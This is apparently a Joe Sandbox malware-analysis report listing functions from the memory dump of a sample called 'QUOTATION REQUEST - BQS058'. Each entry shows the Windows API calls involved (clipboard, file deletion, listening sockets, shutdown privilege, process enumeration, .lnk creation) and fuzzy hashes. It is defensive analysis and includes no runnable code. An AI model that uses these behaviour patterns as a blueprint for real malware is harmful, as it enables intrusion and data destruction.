RegCloseKey.ADVAPI32(00000000), ref: 0105082F

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 21ed2639eb39e91889f6578630c64d64d9e2103f58a581695aaabeb5da646345
Instruction ID: b88d6680a905eafa44d479c1d09c7ebad7dc44d55c36d81a5e24fef7801bfed3
Opcode Fuzzy Hash: 21ed2639eb39e91889f6578630c64d64d9e2103f58a581695aaabeb5da646345
Instruction Fuzzy Hash: CAE17E31604205AFCB54DF28C894D2FBBE5FF89714F08856DF88ADB265DA35E805CB91

Function 01044164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0104418B
EmptyClipboard.USER32 ref: 01044191
GlobalAlloc.KERNEL32(00000002,?), ref: 010441A6
CloseClipboard.USER32 ref: 01044245

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: fbcf7a16ea246b36c8988c6723f0a2a74da6e135703864a758e6f0b72af05356
Instruction ID: 1628317bec70a9c4cfdb7c6fd5de9fb6e24260ce8d7c3d165a0c9571b21d1139
Opcode Fuzzy Hash: fbcf7a16ea246b36c8988c6723f0a2a74da6e135703864a758e6f0b72af05356
Instruction Fuzzy Hash: 1521A1B53002129FDB21AF64DC59B6E7BA8FF05750F04806AF9C6DB2A5DB79AC00CB54

Function 010337EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770

Part of subcall function 01034A31: GetFileAttributesW.KERNEL32(?,0103370B), ref: 01034A32

FindFirstFileW.KERNEL32(?,?), ref: 010338A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0103394B
MoveFileW.KERNEL32(?,?), ref: 0103395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0103397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0103399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 010339B9

Strings

\*.*, xrefs: 0103384E, 01033857, 0103386C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: a9952be4ad2a32f2d1404c5ef899637bbe206f3047a598a300776f57ca1079ee
Instruction ID: 3dc7377317704d7f16ef8e9488b0e671fed85cbe06a6abec18ae287df3529940
Opcode Fuzzy Hash: a9952be4ad2a32f2d1404c5ef899637bbe206f3047a598a300776f57ca1079ee
Instruction Fuzzy Hash: 3551A33180524D9ACF11FBA4DD929EDB7B9AF50300F6400AAE482BB291EF356F0DDB51

Function 0103F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0103F440
Sleep.KERNEL32(0000000A), ref: 0103F470
_wcscmp.LIBCMT ref: 0103F484
_wcscmp.LIBCMT ref: 0103F49F
FindNextFileW.KERNEL32(?,?), ref: 0103F53D
FindClose.KERNEL32(00000000), ref: 0103F553

Strings

*.*, xrefs: 0103F425

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: f5bc0eb6a8c2a06d74c9261f604838f71dce9dcbf82d58e605704510cd9679f3
Instruction ID: a6232bea56d28b3af1fd7de8294e2fc2c3db37e3ce85a9c45ad4db1511d05b14
Opcode Fuzzy Hash: f5bc0eb6a8c2a06d74c9261f604838f71dce9dcbf82d58e605704510cd9679f3
Instruction Fuzzy Hash: D3418E71C0020A9FDF50EF68DC48AEEBBB8FF45310F184096E995A7291EB359A84CB51

Function 00FE5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FE58A5
_memmove.LIBCMT ref: 00FE58F5
_memmove.LIBCMT ref: 00FE595B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d12b97aad01a1c3ec9bfd4fb33ef04529c959b271ade858c25becd3c8987fdd0
Instruction ID: 9d0770e0ba47929280e369c4df7fb68b724477687a9198f7fca329f9f12e64cd
Opcode Fuzzy Hash: d12b97aad01a1c3ec9bfd4fb33ef04529c959b271ade858c25becd3c8987fdd0
Instruction Fuzzy Hash: 3D12CC70A00619DFDF14DFA5C981AEEB7F6FF48304F10452AE886E7255EB3AA910DB50

Function 01033B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770

Part of subcall function 01034A31: GetFileAttributesW.KERNEL32(?,0103370B), ref: 01034A32

FindFirstFileW.KERNEL32(?,?), ref: 01033B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 01033BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 01033BEA
FindClose.KERNEL32(00000000), ref: 01033C01
FindClose.KERNEL32(00000000), ref: 01033C0A

Strings

\*.*, xrefs: 01033B5B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: d91d494efa53713ccbdf93fa21201f7bc9be02d087e078042a27cdd51eb459d8
Instruction ID: 2fc309fb25bb13b4ab3a130e0e85c949a3edb9073b32325e3788f3cb8e72002b
Opcode Fuzzy Hash: d91d494efa53713ccbdf93fa21201f7bc9be02d087e078042a27cdd51eb459d8
Instruction Fuzzy Hash: 2C31A0310083859FC305FF28D8918AFB7EDBE91204F484D5EF4D586292EB29DA09DB63

Function 010351BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 010287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0102882B
Part of subcall function 010287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01028858
Part of subcall function 010287E1: GetLastError.KERNEL32 ref: 01028865

ExitWindowsEx.USER32(?,00000000), ref: 010351F9

Strings

@, xrefs: 010351EC
, xrefs: 010351E7
SeShutdownPrivilege, xrefs: 010351C9

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 080c367d44749aa838160397c54c74df83d68937f0718ba99c24ea61ffaa6e9f
Instruction ID: ceb1a7e4ad2e452794c338378acadcd9c8634324362173b35703e2b569709bb1
Opcode Fuzzy Hash: 080c367d44749aa838160397c54c74df83d68937f0718ba99c24ea61ffaa6e9f
Instruction Fuzzy Hash: 44012B357912126BF778726C9C8AFBB76DCEB86240F140865FAC3E60E1D5555C008690

Function 01046283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010462DC
WSAGetLastError.WSOCK32(00000000), ref: 010462EB
bind.WSOCK32(00000000,?,00000010), ref: 01046307
listen.WSOCK32(00000000,00000005), ref: 01046316
WSAGetLastError.WSOCK32(00000000), ref: 01046330
closesocket.WSOCK32(00000000,00000000), ref: 01046344

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 9278d5e868049b8bc2ae3d50815d9aa327ddda265ceef498e342b81285ffd1a8
Instruction ID: 878059b502ee5d63887a872fdc0254a5c52731342b62e2712eba5d2e759c0fe3
Opcode Fuzzy Hash: 9278d5e868049b8bc2ae3d50815d9aa327ddda265ceef498e342b81285ffd1a8
Instruction Fuzzy Hash: A721F2706002159FCB10EF68C889A7EB7F9EF45720F148169E896E73C1DB79AD00DB51

Function 00FE5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01

_memmove.LIBCMT ref: 01020258
_memmove.LIBCMT ref: 0102036D
_memmove.LIBCMT ref: 01020414

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 9e3b68ec94a937b27b354af98992667e6c39ee96cf3712e5910da806da7e4c7f
Instruction ID: a655db93352f321251eae04be6a83ecefb7a70e73f3e71443595e9fde5a74000
Opcode Fuzzy Hash: 9e3b68ec94a937b27b354af98992667e6c39ee96cf3712e5910da806da7e4c7f
Instruction Fuzzy Hash: 2302CDB1A00219DBCF04DF68D981ABEBBB5EF44304F1480AAF84ADB355EB35D910DB91

Function 00FD1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00FD19FA
GetSysColor.USER32(0000000F), ref: 00FD1A4E
SetBkColor.GDI32(?,00000000), ref: 00FD1A61

Part of subcall function 00FD1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FD12D8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 9a80bc3b4dda5667b2163f51b4672ddfcdd6ce2b215db735a534f16034374798
Instruction ID: c8fe93895bf1cf6cc43cbf42efc0cb6bdd9aa7b595750263fb52e71b9cee70a1
Opcode Fuzzy Hash: 9a80bc3b4dda5667b2163f51b4672ddfcdd6ce2b215db735a534f16034374798
Instruction Fuzzy Hash: F5A13772106546BAF735AA298C58EBF399EFB42351F1C020BF582D53C5C9298D41B3B2

Function 01046747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 01047D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01047DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0104679E
WSAGetLastError.WSOCK32(00000000), ref: 010467C7
bind.WSOCK32(00000000,?,00000010), ref: 01046800
WSAGetLastError.WSOCK32(00000000), ref: 0104680D
closesocket.WSOCK32(00000000,00000000), ref: 01046821

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 4287864cd2b2693039bb09a9fa8532c0fc35cdb243be95a1f04b345346ee6e7b
Instruction ID: 0f03efba4df27caa18da0ad33785a3a0cb12e1b696646227a94b83e560567582
Opcode Fuzzy Hash: 4287864cd2b2693039bb09a9fa8532c0fc35cdb243be95a1f04b345346ee6e7b
Instruction Fuzzy Hash: EB41E375A002106FEB10BF68CC86F7E77EAAF05B10F48845DF955AB3C2DA789D019791

Function 01055376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 010553C5
IsWindowEnabled.USER32 ref: 010553D3
GetForegroundWindow.USER32(?,?,00000001), ref: 010553E0
IsIconic.USER32 ref: 010553EE
IsZoomed.USER32 ref: 010553FC

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: e55a460d8bd0a7df519ebff1d8271ef5af391aabc3f9b62f0173810ec4518fa7
Instruction ID: 5fc21f258dfcfdd1f341a6be8bcc1e88c33e4e722c4fdf7f7734962eaa956404
Opcode Fuzzy Hash: e55a460d8bd0a7df519ebff1d8271ef5af391aabc3f9b62f0173810ec4518fa7
Instruction Fuzzy Hash: 2911E231300211ABEB616F2ADC48A6F7BDDEF44760F448069EDC9D3242CBB898018AA0

Function 0102810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01028121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0102812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0102813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01028141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01028157

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: aaaaa121cb743bbf8944a61e3a87ff12a66ece0039e20c82b5e32e8c0c8caa26
Instruction ID: 96366769b90b7b7d8007f85e5c1e22cad9b135eb0ff358ce014e8752e1834f19
Opcode Fuzzy Hash: aaaaa121cb743bbf8944a61e3a87ff12a66ece0039e20c82b5e32e8c0c8caa26
Instruction Fuzzy Hash: 97F0C274201325AFEB611FA8EC8DE6B3BECFF4A654B104056F9C5C3180DB6A9800DB60

Function 0103C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0103C432
CoCreateInstance.OLE32(01062D6C,00000000,00000001,01062BDC,?), ref: 0103C44A

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

CoUninitialize.OLE32 ref: 0103C6B7

Strings

.lnk, xrefs: 0103C3C6, 0103C3EE, 0103C3F8

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 9b9d741ea5a8477797aa57d96c22f84161e8bc9a8973125f573fa118053f21b2
Instruction ID: 7e46d2581a6369262fde8415c12ed9cc94ae2b9ab52ecec525e85a3cb526cd8f
Opcode Fuzzy Hash: 9b9d741ea5a8477797aa57d96c22f84161e8bc9a8973125f573fa118053f21b2
Instruction Fuzzy Hash: E3A15A71108205AFD300EF54CC81EABB7EDEF88744F04491EF1959B291EBB5E909DB52

Function 00FD4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00FD4AD0), ref: 00FD4B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FD4B57

Strings

GetNativeSystemInfo, xrefs: 00FD4B51
kernel32.dll, xrefs: 00FD4B40

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: a25ae9c3c181fe83110fda6ccfc049760857f369f32de18719e1c1da1967d03a
Instruction ID: fed0ca14145defcf048eaf2234063fd2ac7c0dd97cbe567166913f4322a62fa0
Opcode Fuzzy Hash: a25ae9c3c181fe83110fda6ccfc049760857f369f32de18719e1c1da1967d03a
Instruction Fuzzy Hash: E8D01234A10713CFD7209F32D828B0776D5AF56251B15882F98C5DA200E678E880C758

Function 00FE3030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 0bed5fa6e1d31319e351261fa4ded8b000f6184834c60eb6c4f7d1c6cef04d0f
Instruction ID: bc02510d84b3bff6f693666802c88f1639f0ebd01c0fdd861e312acba81bf063
Opcode Fuzzy Hash: 0bed5fa6e1d31319e351261fa4ded8b000f6184834c60eb6c4f7d1c6cef04d0f
Instruction Fuzzy Hash: E422DD71A083419FC724DF24C884BAFB7E5AF84710F04492DF99A97391DB79EA04DB92

Function 0104EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0104EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0104EE4B

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Process32NextW.KERNEL32(00000000,?), ref: 0104EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0104EF1A

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 00143a456813f17943db7a04b0442d7d49c1c1040903061f13c71ae61661acee
Instruction ID: 7a3144a45852bddffdbd2157446b66afb87c3e0227b25ec1240ba7db90f0a67f
Opcode Fuzzy Hash: 00143a456813f17943db7a04b0442d7d49c1c1040903061f13c71ae61661acee
Instruction Fuzzy Hash: 5C517BB1508301ABD320EF24DC81E6BB7E9EF84750F44482EF595972A1EB74E908DB92

